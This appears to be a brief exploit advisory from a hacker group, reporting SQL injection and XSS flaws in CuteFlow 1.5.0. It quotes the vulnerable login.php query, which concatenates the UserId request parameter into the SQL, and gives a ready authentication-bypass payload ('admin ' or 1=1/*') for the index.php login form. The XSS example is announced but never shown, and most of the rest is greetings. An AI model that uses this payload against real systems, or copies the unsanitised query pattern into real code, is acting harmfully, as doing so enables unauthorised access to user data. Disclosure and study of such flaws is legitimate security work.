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CuteFlow Version 1.5.0 Multiple Remote Vulnerabilities

             #     CuteFlow Version 1.5.0 Multiple Remote Vulnerabilities       
             #                      [sql injection & Xss]                       

Virangar Security Team


Discoverd By : hadihadi 

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all iranian hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal) from emperor team :)

sql vuln code in login.php:

$query = "select * from cf_user where strPassword = '$strMd5Password' AND 
strUserId = '".$_REQUEST["UserId"]."'";

 the login forme included in index.php you must login in index.php ;)
login:admin ' or 1=1/*
and you can see xss vuln too here:

tnx all h4ck3rz